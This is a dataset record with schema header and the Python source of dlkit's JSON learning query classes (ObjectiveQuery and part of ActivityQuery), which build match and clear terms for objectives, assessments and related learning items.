hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c98b0791a0f21fc401bfce5e57f30be97089acf
| 68,757
|
py
|
Python
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON implementations of learning queries."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from .. import utilities
from ..id.objects import IdList
from ..osid import queries as osid_queries
from ..primitives import Id
from ..utilities import get_registry
from dlkit.abstract_osid.learning import queries as abc_learning_queries
from dlkit.abstract_osid.osid import errors
class ObjectiveQuery(abc_learning_queries.ObjectiveQuery, osid_queries.OsidObjectQuery, osid_queries.OsidFederateableQuery):
    """This is the query for searching objectives.

    Each method match request produces an ``AND`` term while multiple
    invocations of a method produces a nested ``OR``.

    """
    def __init__(self, runtime):
        """Initialize the query with the record types registered for objectives.

        arg: runtime: the runtime proxy used to look up the
            ``OBJECTIVE_RECORD_TYPES`` registry
        """
        self._namespace = 'learning.Objective'
        self._runtime = runtime
        record_type_data_sets = get_registry('OBJECTIVE_RECORD_TYPES', runtime)
        self._all_supported_record_type_data_sets = record_type_data_sets
        # Pre-compute the string form of every supported record type Id.
        self._all_supported_record_type_ids = []
        for data_set in record_type_data_sets:
            self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
        osid_queries.OsidObjectQuery.__init__(self, runtime)

    @utilities.arguments_not_none
    def match_assessment_id(self, assessment_id, match):
        """Sets the assessment ``Id`` for this query.

        arg:    assessment_id (osid.id.Id): an assessment ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``assessment_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('assessmentId', str(assessment_id), match)

    def clear_assessment_id_terms(self):
        """Clears the assessment ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('assessmentId')

    assessment_id_terms = property(fdel=clear_assessment_id_terms)

    def supports_assessment_query(self):
        """Tests if an ``AssessmentQuery`` is available for querying activities.

        return: (boolean) - ``true`` if an assessment query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_assessment_query(self):
        """Gets the query for an assessment.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.assessment.AssessmentQuery) - the assessment query
        raise:  Unimplemented - ``supports_assessment_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_assessment_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    assessment_query = property(fget=get_assessment_query)

    @utilities.arguments_not_none
    def match_any_assessment(self, match):
        """Matches an objective that has any assessment assigned.

        arg:    match (boolean): ``true`` to match objectives with any
                assessment, ``false`` to match objectives with no
                assessment
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_assessment_terms(self):
        """Clears the assessment terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('assessment')

    assessment_terms = property(fdel=clear_assessment_terms)

    @utilities.arguments_not_none
    def match_knowledge_category_id(self, grade_id, match):
        """Sets the knowledge category ``Id`` for this query.

        arg:    grade_id (osid.id.Id): a grade ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``grade_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('knowledgeCategoryId', str(grade_id), match)

    def clear_knowledge_category_id_terms(self):
        """Clears the knowledge category ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('knowledgeCategoryId')

    knowledge_category_id_terms = property(fdel=clear_knowledge_category_id_terms)

    def supports_knowledge_category_query(self):
        """Tests if a ``GradeQuery`` is available for querying knowledge categories.

        return: (boolean) - ``true`` if a grade query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_knowledge_category_query(self):
        """Gets the query for a knowledge category.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.grading.GradeQuery) - the grade query
        raise:  Unimplemented - ``supports_knowledge_category_query()``
                is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_knowledge_category_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    knowledge_category_query = property(fget=get_knowledge_category_query)

    @utilities.arguments_not_none
    def match_any_knowledge_category(self, match):
        """Matches an objective that has any knowledge category.

        arg:    match (boolean): ``true`` to match objectives with any
                knowledge category, ``false`` to match objectives with
                no knowledge category
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_knowledge_category_terms(self):
        """Clears the knowledge category terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('knowledgeCategory')

    knowledge_category_terms = property(fdel=clear_knowledge_category_terms)

    @utilities.arguments_not_none
    def match_cognitive_process_id(self, grade_id, match):
        """Sets the cognitive process ``Id`` for this query.

        arg:    grade_id (osid.id.Id): a grade ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``grade_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('cognitiveProcessId', str(grade_id), match)

    def clear_cognitive_process_id_terms(self):
        """Clears the cognitive process ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('cognitiveProcessId')

    cognitive_process_id_terms = property(fdel=clear_cognitive_process_id_terms)

    def supports_cognitive_process_query(self):
        """Tests if a ``GradeQuery`` is available for querying cognitive processes.

        return: (boolean) - ``true`` if a grade query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_cognitive_process_query(self):
        """Gets the query for a cognitive process.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.grading.GradeQuery) - the grade query
        raise:  Unimplemented - ``supports_cognitive_process_query()``
                is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_cognitive_process_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    cognitive_process_query = property(fget=get_cognitive_process_query)

    @utilities.arguments_not_none
    def match_any_cognitive_process(self, match):
        """Matches an objective that has any cognitive process.

        arg:    match (boolean): ``true`` to match objectives with any
                cognitive process, ``false`` to match objectives with no
                cognitive process
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_cognitive_process_terms(self):
        """Clears the cognitive process terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('cognitiveProcess')

    cognitive_process_terms = property(fdel=clear_cognitive_process_terms)

    @utilities.arguments_not_none
    def match_activity_id(self, activity_id, match):
        """Sets the activity ``Id`` for this query.

        arg:    activity_id (osid.id.Id): an activity ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``activity_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('activityId', str(activity_id), match)

    def clear_activity_id_terms(self):
        """Clears the activity ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('activityId')

    activity_id_terms = property(fdel=clear_activity_id_terms)

    def supports_activity_query(self):
        """Tests if an ``ActivityQuery`` is available for querying activities.

        return: (boolean) - ``true`` if an activity query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_activity_query(self):
        """Gets the query for an activity.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ActivityQuery) - the activity query
        raise:  Unimplemented - ``supports_activity_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_activity_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    activity_query = property(fget=get_activity_query)

    @utilities.arguments_not_none
    def match_any_activity(self, match):
        """Matches an objective that has any related activity.

        arg:    match (boolean): ``true`` to match objectives with any
                activity, ``false`` to match objectives with no activity
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_activity_terms(self):
        """Clears the activity terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    activity_terms = property(fdel=clear_activity_terms)

    @utilities.arguments_not_none
    def match_requisite_objective_id(self, requisite_objective_id, match):
        """Sets the requisite objective ``Id`` for this query.

        arg:    requisite_objective_id (osid.id.Id): a requisite
                objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``requisite_objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('requisiteObjectiveId', str(requisite_objective_id), match)

    def clear_requisite_objective_id_terms(self):
        """Clears the requisite objective ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('requisiteObjectiveId')

    requisite_objective_id_terms = property(fdel=clear_requisite_objective_id_terms)

    def supports_requisite_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available for querying requisite objectives.

        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_requisite_objective_query(self):
        """Gets the query for a requisite objective.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_requisite_objective_query()``
                is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_requisite_objective_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    requisite_objective_query = property(fget=get_requisite_objective_query)

    @utilities.arguments_not_none
    def match_any_requisite_objective(self, match):
        """Matches an objective that has any related requisite.

        arg:    match (boolean): ``true`` to match objectives with any
                requisite, ``false`` to match objectives with no
                requisite
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_requisite_objective_terms(self):
        """Clears the requisite objective terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    requisite_objective_terms = property(fdel=clear_requisite_objective_terms)

    @utilities.arguments_not_none
    def match_dependent_objective_id(self, dependent_objective_id, match):
        """Sets the dependent objective ``Id`` to query objectives dependent on the given objective.

        arg:    dependent_objective_id (osid.id.Id): a dependent
                objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``dependent_objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('dependentObjectiveId', str(dependent_objective_id), match)

    def clear_dependent_objective_id_terms(self):
        """Clears the dependent objective ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('dependentObjectiveId')

    dependent_objective_id_terms = property(fdel=clear_dependent_objective_id_terms)

    def supports_depndent_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available for querying dependent objectives.

        NOTE: the misspelled name ("depndent") comes from the published
        specification and is kept for compatibility; prefer the
        correctly-spelled alias ``supports_dependent_objective_query``.

        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    # Correctly-spelled, backward-compatible alias for the spec's typo.
    supports_dependent_objective_query = supports_depndent_objective_query

    def get_dependent_objective_query(self):
        """Gets the query for a dependent objective.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_dependent_objective_query()``
                is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_dependent_objective_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    dependent_objective_query = property(fget=get_dependent_objective_query)

    @utilities.arguments_not_none
    def match_any_dependent_objective(self, match):
        """Matches an objective that has any related dependents.

        arg:    match (boolean): ``true`` to match objectives with any
                dependent, ``false`` to match objectives with no
                dependents
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_dependent_objective_terms(self):
        """Clears the dependent objective terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    dependent_objective_terms = property(fdel=clear_dependent_objective_terms)

    @utilities.arguments_not_none
    def match_equivalent_objective_id(self, equivalent_objective_id, match):
        """Sets the equivalent objective ``Id`` to query equivalents.

        arg:    equivalent_objective_id (osid.id.Id): an equivalent
                objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``equivalent_objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('equivalentObjectiveId', str(equivalent_objective_id), match)

    def clear_equivalent_objective_id_terms(self):
        """Clears the equivalent objective ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('equivalentObjectiveId')

    equivalent_objective_id_terms = property(fdel=clear_equivalent_objective_id_terms)

    def supports_equivalent_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available for querying equivalent objectives.

        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_equivalent_objective_query(self):
        """Gets the query for an equivalent objective.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented -
                ``supports_equivalent_objective_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_equivalent_objective_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    equivalent_objective_query = property(fget=get_equivalent_objective_query)

    @utilities.arguments_not_none
    def match_any_equivalent_objective(self, match):
        """Matches an objective that has any related equivalents.

        arg:    match (boolean): ``true`` to match objectives with any
                equivalent, ``false`` to match objectives with no
                equivalents
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_equivalent_objective_terms(self):
        """Clears the equivalent objective terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    equivalent_objective_terms = property(fdel=clear_equivalent_objective_terms)

    @utilities.arguments_not_none
    def match_ancestor_objective_id(self, objective_id, match):
        """Sets the objective ``Id`` for this query to match objectives that have the specified objective as an ancestor.

        arg:    objective_id (osid.id.Id): an objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('ancestorObjectiveId', str(objective_id), match)

    def clear_ancestor_objective_id_terms(self):
        """Clears the ancestor objective ``Id`` query terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('ancestorObjectiveId')

    ancestor_objective_id_terms = property(fdel=clear_ancestor_objective_id_terms)

    def supports_ancestor_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available.

        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_ancestor_objective_query(self):
        """Gets the query for an objective.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_ancestor_objective_query()``
                is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_ancestor_objective_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    ancestor_objective_query = property(fget=get_ancestor_objective_query)

    @utilities.arguments_not_none
    def match_any_ancestor_objective(self, match):
        """Matches objectives that have any ancestor.

        arg:    match (boolean): ``true`` to match objective with any
                ancestor, ``false`` to match root objectives
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_ancestor_objective_terms(self):
        """Clears the ancestor objective query terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    ancestor_objective_terms = property(fdel=clear_ancestor_objective_terms)

    @utilities.arguments_not_none
    def match_descendant_objective_id(self, objective_id, match):
        """Sets the objective ``Id`` for this query to match objectives that have the specified objective as a descendant.

        arg:    objective_id (osid.id.Id): an objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('descendantObjectiveId', str(objective_id), match)

    def clear_descendant_objective_id_terms(self):
        """Clears the descendant objective ``Id`` query terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('descendantObjectiveId')

    descendant_objective_id_terms = property(fdel=clear_descendant_objective_id_terms)

    def supports_descendant_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available.

        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_descendant_objective_query(self):
        """Gets the query for an objective.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented -
                ``supports_descendant_objective_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_descendant_objective_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    descendant_objective_query = property(fget=get_descendant_objective_query)

    @utilities.arguments_not_none
    def match_any_descendant_objective(self, match):
        """Matches objectives that have any ancestor.

        arg:    match (boolean): ``true`` to match objectives with any
                ancestor, ``false`` to match leaf objectives
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def clear_descendant_objective_terms(self):
        """Clears the descendant objective query terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    descendant_objective_terms = property(fdel=clear_descendant_objective_terms)

    @utilities.arguments_not_none
    def match_objective_bank_id(self, objective_bank_id, match):
        """Sets the objective bank ``Id`` for this query.

        arg:    objective_bank_id (osid.id.Id): an objective bank ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_bank_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.match_bin_id
        self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)

    def clear_objective_bank_id_terms(self):
        """Clears the objective bank ``Id`` terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
        self._clear_terms('assignedObjectiveBankIds')

    objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)

    def supports_objective_bank_query(self):
        """Tests if a ``ObjectiveBankQuery`` is available for querying objective banks.

        return: (boolean) - ``true`` if an objective bank query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()

    def get_objective_bank_query(self):
        """Gets the query for an objective bank.

        Multiple retrievals produce a nested ``OR`` term.

        return: (osid.learning.ObjectiveBankQuery) - the objective bank
                query
        raise:  Unimplemented - ``supports_objective_bank_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_bank_query()`` is ``true``.*

        """
        raise errors.Unimplemented()

    objective_bank_query = property(fget=get_objective_bank_query)

    def clear_objective_bank_terms(self):
        """Clears the objective bank terms.

        *compliance: mandatory -- This method must be implemented.*

        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('objectiveBank')

    objective_bank_terms = property(fdel=clear_objective_bank_terms)

    @utilities.arguments_not_none
    def get_objective_query_record(self, objective_record_type):
        """Gets the objective query record corresponding to the given ``Objective`` record ``Type``.

        Multiple retrievals produce a nested ``OR`` term.

        arg:    objective_record_type (osid.type.Type): an objective
                query record type
        return: (osid.learning.records.ObjectiveQueryRecord) - the
                objective query record
        raise:  NullArgument - ``objective_record_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  Unsupported - ``has_record_type(objective_record_type)``
                is ``false``
        *compliance: mandatory -- This method must be implemented.*

        """
        raise errors.Unimplemented()
class ActivityQuery(abc_learning_queries.ActivityQuery, osid_queries.OsidObjectQuery, osid_queries.OsidSubjugateableQuery):
    """This is the query for searching activities.
    Each method match request produces an ``AND`` term while multiple
    invocations of a method produces a nested ``OR``.
    """
    def __init__(self, runtime):
        self._namespace = 'learning.Activity'
        self._runtime = runtime
        record_type_data_sets = get_registry('ACTIVITY_RECORD_TYPES', runtime)
        self._all_supported_record_type_data_sets = record_type_data_sets
        self._all_supported_record_type_ids = []
        for data_set in record_type_data_sets:
            self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
        osid_queries.OsidObjectQuery.__init__(self, runtime)

    @utilities.arguments_not_none
    def match_objective_id(self, objective_id, match):
        """Sets the objective ``Id`` for this query.
        arg:    objective_id (osid.id.Id): an objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('objectiveId', str(objective_id), match)

    def clear_objective_id_terms(self):
        """Clears the objective ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('objectiveId')

    objective_id_terms = property(fdel=clear_objective_id_terms)

    def supports_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available for querying objectives.
        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_objective_query(self):
        """Gets the query for an objective.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_objective_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    objective_query = property(fget=get_objective_query)

    def clear_objective_terms(self):
        """Clears the objective terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('objective')

    objective_terms = property(fdel=clear_objective_terms)

    @utilities.arguments_not_none
    def match_asset_id(self, asset_id, match):
        """Sets the asset ``Id`` for this query.
        arg:    asset_id (osid.id.Id): an asset ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``asset_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('assetId', str(asset_id), match)

    def clear_asset_id_terms(self):
        """Clears the asset ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('assetId')

    asset_id_terms = property(fdel=clear_asset_id_terms)

    def supports_asset_query(self):
        """Tests if an ``AssetQuery`` is available for querying assets.
        return: (boolean) - ``true`` if an asset query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

